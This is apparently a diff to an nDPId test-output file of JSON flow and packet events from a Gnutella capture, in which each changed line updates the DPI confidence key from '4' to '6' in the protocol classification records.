00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2373,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139669,"flow_last_seen":139669,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139669,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.224.174.174","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2373,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":139669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139669,"pkt":"UlQAEjUCCAAn5uVZCABFAABtmlYAAIARtYwKAAIPL+CurnAJGMoAWfYTyxgxAvXWHJDN+FF7HrIjWEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2373,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139669,"flow_last_seen":139669,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139669,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.224.174.174","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2373,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139669,"flow_last_seen":139669,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139669,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.224.174.174","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2374,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":3,"flow_last_seen":139669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139669,"pkt":"UlQAEjUCCAAn5uVZCABFAABtTeQAAIAR4qUKAAIPSfqz7XAJUXAAWTtzDAwxAhYFwQyFnvxYxDh4UUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2375,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":3,"flow_last_seen":139669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139669,"pkt":"UlQAEjUCCAAn5uVZCABFAABtxQMAAIAR4QkKAAIPvKXLvnAJVesAWccLy3UxAr1ooy\/Zmhwx1EOQ8UQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2379,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":3,"flow_last_seen":139695,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139695,"pkt":"UlQAEjUCCAAn5uVZCABFAABtX58AAIARHekKAAIPXNlUEHAJTv8AWRxrcuoxAvEddJz1CNyRxwOe00QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 01409{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2380,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":2,"flow_last_seen":139713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":139713,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBs8AAEARdY8\/5K+pCgACDweQcAkC3wv2JBYxAlmizjMkdrKTCQRuaEQAAMACAAAGR1RLRwAAvVxlUBplmElM4+WSnDqN9PxphG0EP+SvqQeQAQAAAAQC89xEFEdUS0cAAISEnKMAahWoBBfUee10B\/B49\/r0BBh0QITIG0dUS0cAAIQFsf+Bv2njsZMOcK5XBzk5Qq3rBN3GzcRRKkdUS0cAAIPPdMtTw3ywAQrcKHskULaFt8T9BFd7NurTckdUS0cAAIBDDfCNVDqFgBWTNBe\/R1a2V7AXBLm7Sq3Q8UdUS0cAAI1c\/QX9I39S2eczHf8bGxQqBh3SBCaOd+rCRFdTSFIAAIsML3baZ9qjEzov01XuwUWPp8CvBBiB6TxOFldTSFIAAIgInuBYn2DWNYTpgSOhE3nGOSSqBGLQGpoTgldTSFIAAJMpLUy99S6l5+o3G\/7HZbY0zUPGBFnUW5sUS1NOT1cAAJJLJdecP9uDvZhuUeP7MwcedtuWBM8mo+QaekdUS0cAAJ6Xxzbx1oA8a67zMFTEYzHds+ukBEziVWkYyldTSFIAAJ7Bez1ZQQgPxovuLAykgS8CMrDdBLAKqQox\/0dUS0cAAJp\/6ofTpH0Z7c9sfONgy\/6jjg5ZBFTFYV4FUFdTSFIAAJgFqYyWS9v2Yq4KyYrmzTVJWc5SBGP6\/WMuK0dUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO0dUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAALSr6ArQaneMzMJ81PWuqjO12gqLBLV2NdR1LkdUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSEdUS0cAALFbZ+HgSIrho0RaGRNTd1qTgMZFBC0fmHBo4w=="} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2382,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":3,"flow_last_seen":139724,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139724,"pkt":"UlQAEjUCCAAn5uVZCABFAABtGLkAAIARtUAKAAIPsGOwFHAJGMoAWZkZdrExAg1GSrdXL+O9TXzC9kQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2383,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":3,"flow_last_seen":139724,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139724,"pkt":"UlQAEjUCCAAn5uVZCABFAABtceoAAIARV2EKAAIPrbe3bnAJ6hAAWRX5yaAxAh\/9BvdPXg4EHkta+EQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2407,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":9752,"flow_last_seen":14765,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":140848,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2407,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":9752,"flow_last_seen":17749,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":140848,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2407,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":9752,"flow_last_seen":14765,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":140848,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2407,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":9752,"flow_last_seen":17749,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":140848,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2525,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":3,"flow_last_seen":152618,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":152618,"pkt":"UlQAEjUCCAAn5uVZCABFAABtv\/0AAIAR2ksKAAIPucvaXHAJ3oIAWWGJo3cxAvUqie+XZ8I4MOlY7kQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2526,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":3,"flow_last_seen":152619,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":152619,"pkt":"UlQAEjUCCAAn5uVZCABFAABtDeIAAIARALwKAAIPQh7dtXAJLuwAWUb9hToxArVYIH1ZKsd\/uJMQM0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2527,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":3,"flow_last_seen":152619,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":152619,"pkt":"UlQAEjUCCAAn5uVZCABFAABthP4AAIARBkEKAAIPLVh12nAJGv0AWYQlGHcxArF+TA2rx0u82pqvx0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} @@ -1309,7 +1309,7 @@ 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2585,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":157736,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":157736,"pkt":"UlQAEjUCCAAn5uVZCABFAABtGY8AAIAR6JQKAAIPXwrNQ3AJLVMAWaXpjUExAjTUCUmhKozUcF9w9kQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2611,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":160009,"flow_last_seen":160009,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":160009,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":51685,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2611,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":160009,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":160009,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4K8AAAER3GoKAAIP7\/\/\/+snlB2wAtiNJTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":160009,"flow_last_seen":160009,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":160009,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":51685,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":160009,"flow_last_seen":160009,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":160009,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":51685,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2621,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":2,"flow_last_seen":161017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":161017,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LAAAAER3GkKAAIP7\/\/\/+snlB2wAtiNJTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2635,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":3,"flow_last_seen":162017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":162017,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LEAAAER3GgKAAIP7\/\/\/+snlB2wAtiNJTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2645,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":3,"flow_last_seen":162802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":162802,"pkt":"UlQAEjUCCAAn5uVZCABFAABtOYEAAIAR2+0KAAIPSMnQOXAJltkAWe6G\/a8xAp990wTPUYO\/Pfo6nUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} @@ -1323,39 +1323,39 @@ 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2725,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":3,"flow_last_seen":168391,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":168391,"pkt":"UlQAEjUCCAAn5uVZCABFAABtAwAAAIARQCcKAAIPtXY11HAJdS4AWVKoRtYxAgh8ZUKNU31EKcU+K0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2727,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168428,"flow_last_seen":168428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168428,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"198.58.218.12","src_port":28681,"dst_port":47912,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2727,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":168428,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":168428,"pkt":"UlQAEjUCCAAn5uVZCABFAABtVroAAIARN3AKAAIPxjraDHAJuygAWfAoVB4xAiIUq1VNOT5K4PsAnkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2727,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168428,"flow_last_seen":168428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168428,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"198.58.218.12","src_port":28681,"dst_port":47912,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2727,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168428,"flow_last_seen":168428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168428,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"198.58.218.12","src_port":28681,"dst_port":47912,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2732,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168555,"flow_last_seen":168555,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168555,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":28681,"dst_port":9915,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":168555,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":168555,"pkt":"UlQAEjUCCAAn5uVZCABFAABtB2EAAIARDDsKAAIPVoHEVHAJJrsAWdbAQsoxAjcNEhOQ8aGFyag54kQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2732,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168555,"flow_last_seen":168555,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168555,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":28681,"dst_port":9915,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2732,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168555,"flow_last_seen":168555,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168555,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":28681,"dst_port":9915,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2733,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":2,"flow_last_seen":168593,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":168593,"pkt":"CAAn5uVZUlQAEjUCCABFAALzB7wAAEARSVpWgcRUCgACDya7cAkC37LQQsoxAjcNEhOQ8aGFyag54kQAAMACAAAGR1RLRwAAUhNI53eBGeJh0nCkclkfZJnzMvMEVoHEVCa7AQAAAATmnBkoFEdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegkdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzukdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj1dTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqkdUS0cAABK1XVsEZ16ugW6JpsS4xfhpSq81BEjJ0DmW2UdUS0cAABZMZh8YJqCRZ8rsFWpJujOrF1VMBFHNWy2cyVdTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEA=="} 